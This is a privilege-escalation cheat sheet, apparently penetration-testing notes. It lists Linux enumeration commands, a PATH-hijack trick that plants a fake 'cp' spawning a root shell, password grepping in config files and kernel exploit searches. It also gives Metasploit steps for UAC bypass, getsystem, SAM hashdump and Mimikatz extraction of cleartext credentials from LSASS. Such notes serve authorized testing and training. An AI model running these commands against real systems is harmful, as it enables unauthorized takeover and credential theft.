Privilege Escalation
Privilege Escalation
Manual Linux Privilege Escalation
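# Check Current User and Groups (use ';' so the later commands still run if one fails)
whoami; id; groups
# Check sudo Permissions (may prompt for the current user's password)
sudo -l
# SUID / SGID Binaries and file capabilities (cross-check hits against GTFOBins)
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
getcap -r / 2>/dev/null
# Check Processes (look for root-owned services; command lines sometimes carry credentials)
ps aux
# Cron Jobs: list them, then check which entries/scripts are actually writable by you
cat /etc/crontab
ls -l /etc/cron.*/*
find /etc/crontab /etc/cron* -writable 2>/dev/null
# Scripts referenced inside a crontab line must be checked individually (ls -l <script>)
# PATH Hijacking: only works when a privileged process (cron job, SUID binary, sudo rule)
# invokes a command by bare name, e.g. "cp", AND its PATH includes a directory you can
# write to. sudo normally resets PATH via secure_path and cron typically sets its own
# PATH, so confirm the target's environment first; /tmp may also be mounted noexec.
printf '#!/bin/bash\nbash -i\n' > /tmp/cp
chmod +x /tmp/cp
export PATH="/tmp:$PATH"
# Search Config Files and Credentials (also worth checking shell history and backup files)
find / -name "*.conf" 2>/dev/null
grep -i "pass" /etc/*.conf 2>/dev/null
# Kernel Exploit (last resort: a failed kernel exploit can crash the host; match the
# exact kernel AND distro build, and test in a lab before running it on a target)
uname -a
cat /etc/os-release
searchsploit linux kernel <version>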
Metasploit Windows Privilege Escalation
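# Background the meterpreter session (note its ID from `sessions -l`)
background
# Suggest local exploits for this host
use post/multi/recon/local_exploit_suggester
set SESSION <ID>
run
# UAC Bypass: only relevant when getuid shows a user in the local Administrators group
# but the session is still medium integrity. A successful bypass spawns a NEW session;
# use that new session's ID for everything below.
use exploit/windows/local/bypassuac
set SESSION <ID>
run
# Attempt privilege escalation to NT AUTHORITY\SYSTEM (usually fails from a
# non-elevated session), then verify
getsystem
getuid
# Migrate to a more stable or privileged process. Pick one whose architecture matches
# the OS (x64 process on x64 Windows): kiwi must run in a same-arch process to read LSASS.
ps
migrate <PID>
# Dump SAM hashes (requires SYSTEM privileges)
hashdump
# Load the Mimikatz extension (kiwi) - run it from a SYSTEM-level, same-arch process
load kiwi
# Extract plaintext creds, hashes, tokens, etc.
creds_all
# View cleartext credentials from memory (needs LSASS read access: SYSTEM or SeDebugPrivilege)
kiwi_cmd sekurlsa::logonpasswords
# View NTLM hashes (if available)
kiwi_cmd sekurlsa::msv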